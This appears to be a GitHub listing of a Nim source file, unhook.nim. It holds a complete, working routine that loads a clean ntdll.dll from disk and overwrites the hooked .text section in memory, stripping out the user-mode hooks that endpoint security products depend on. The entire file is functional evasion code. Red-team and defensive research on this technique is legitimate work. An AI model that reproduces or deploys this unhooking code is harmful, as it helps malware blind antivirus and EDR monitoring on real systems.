-
Notifications
You must be signed in to change notification settings - Fork 353
/
unhook.nim
57 lines (52 loc) · 2.59 KB
/
unhook.nim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import winim
import strutils
import ptr_math
import strformat
proc toString(bytes: openarray[byte]): string =
result = newString(bytes.len)
copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)
proc ntdllunhook(): bool =
let low: uint16 = 0
var
processH = GetCurrentProcess()
mi : MODULEINFO
ntdllModule = GetModuleHandleA("ntdll.dll")
ntdllBase : LPVOID
ntdllFile : FileHandle
ntdllMapping : HANDLE
ntdllMappingAddress : LPVOID
hookedDosHeader : PIMAGE_DOS_HEADER
hookedNtHeader : PIMAGE_NT_HEADERS
hookedSectionHeader : PIMAGE_SECTION_HEADER
GetModuleInformation(processH, ntdllModule, addr mi, cast[DWORD](sizeof(mi)))
ntdllBase = mi.lpBaseOfDll
ntdllFile = getOsFileHandle(open("C:\\windows\\system32\\ntdll.dll",fmRead))
ntdllMapping = CreateFileMapping(ntdllFile, NULL, 16777218, 0, 0, NULL) # 0x02 = PAGE_READONLY & 0x1000000 = SEC_IMAGE
if ntdllMapping == 0:
echo fmt"Could not create file mapping object ({GetLastError()})."
return false
ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0)
if ntdllMappingAddress.isNil:
echo fmt"Could not map view of file ({GetLastError()})."
return false
hookedDosHeader = cast[PIMAGE_DOS_HEADER](ntdllBase)
hookedNtHeader = cast[PIMAGE_NT_HEADERS](cast[DWORD_PTR](ntdllBase) + hookedDosHeader.e_lfanew)
for Section in low ..< hookedNtHeader.FileHeader.NumberOfSections:
hookedSectionHeader = cast[PIMAGE_SECTION_HEADER](cast[DWORD_PTR](IMAGE_FIRST_SECTION(hookedNtHeader)) + cast[DWORD_PTR](IMAGE_SIZEOF_SECTION_HEADER * Section))
if ".text" in toString(hookedSectionHeader.Name):
var oldProtection : DWORD = 0
if VirtualProtect(ntdllBase + hookedSectionHeader.VirtualAddress, hookedSectionHeader.Misc.VirtualSize, 0x40, addr oldProtection) == 0:#0x40 = PAGE_EXECUTE_READWRITE
echo fmt"Failed calling VirtualProtect ({GetLastError()})."
return false
copyMem(ntdllBase + hookedSectionHeader.VirtualAddress, ntdllMappingAddress + hookedSectionHeader.VirtualAddress, hookedSectionHeader.Misc.VirtualSize)
if VirtualProtect(ntdllBase + hookedSectionHeader.VirtualAddress, hookedSectionHeader.Misc.VirtualSize, oldProtection, addr oldProtection) == 0:
echo fmt"Failed resetting memory back to it's orignal protections ({GetLastError()})."
return false
CloseHandle(processH)
CloseHandle(ntdllFile)
CloseHandle(ntdllMapping)
FreeLibrary(ntdllModule)
return true
when isMainModule:
var result = ntdllunhook()
echo fmt"[*] unhook Ntdll: {bool(result)}"